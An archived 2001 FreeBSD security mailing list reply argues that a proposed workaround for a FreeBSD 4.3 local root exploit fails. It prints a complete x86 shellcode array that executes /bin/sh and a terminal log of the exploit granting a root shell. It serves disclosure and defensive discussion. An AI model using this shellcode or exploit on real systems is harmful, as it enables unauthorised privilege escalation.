From owner-freebsd-security  Thu Jul 12 10:36:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost.freebsd.lublin.pl (mailhost.freebsd.lublin.pl [212.182.115.12])
	by hub.freebsd.org (Postfix) with ESMTP id D017437B406
	for <security@FreeBSD.ORG>; Thu, 12 Jul 2001 10:36:48 -0700 (PDT)
	(envelope-from venglin@freebsd.lublin.pl)
Received: from clitoris (root@mailhost.freebsd.lublin.pl [212.182.115.12])
	by mailhost.freebsd.lublin.pl (8.11.4/8.11.4) with SMTP id f6CHYIr83592;
	Thu, 12 Jul 2001 19:34:19 +0200 (CEST)
	(envelope-from venglin@freebsd.lublin.pl)
Message-ID: <087701c10af8$9ed30040$2001a8c0@clitoris>
From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To: "jamie rishaw" <jamie@playboy.com>, "alexus" <ml@db.nexgen.com>
Cc: "Gabriel Rocha" <grocha@geeksimplex.org>, <security@FreeBSD.ORG>
References: <20010712120706.B1020@geeksimplex.org> <079e01c10aef$21fd1460$2001a8c0@clitoris> <001f01c10af7$9b42f120$97625c42@alexus> <20010712122743.C14782@playboy.com>
Subject: Re: FreeBSD 4.3 local root
Date: Thu, 12 Jul 2001 19:32:21 +0200
Organization: babcia padlina ltd.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

> su
> cd /tmp
> touch sh
> chmod 000 sh
> chflags schg sh

Anyone could use shellcode which calls directly /bin/sh; your fix won't work
in this case...

unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

riget:venglin:~> ./dupa
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe4a
child=83578
Password:done

# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
# ls -la /tmp/sh
ls: /tmp/sh: No such file or directory

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message